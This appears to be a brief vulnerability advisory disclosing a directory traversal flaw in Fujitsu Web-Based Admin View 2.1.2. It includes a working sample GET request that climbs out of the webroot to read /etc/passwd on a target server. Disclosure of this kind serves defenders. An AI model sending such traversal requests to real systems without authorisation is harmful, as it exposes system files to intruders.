Fujitsu Web-Based Admin View version 2.1.2 suffers from a directory traversal vulnerability.
9346267fb836e3abbe4ae26b5494f37f1a97d864da56456cc63bc045d54d3c34
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
Version: 2.1.2 on Solaris, Other versions may vulnerable
Vulnerability: Directory Traversal
Risk: Critical
Description: Due to insufficient control of user inputs, Fujitsu
Web-based admin view reveals content of files residing in folders other
than webroot. This will allow an attacker to view arbitrary local files
within the context of the web server.
Sample Request:
GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
Host: target:8081
Deniz CEVIK
www.intellectpro.com.tr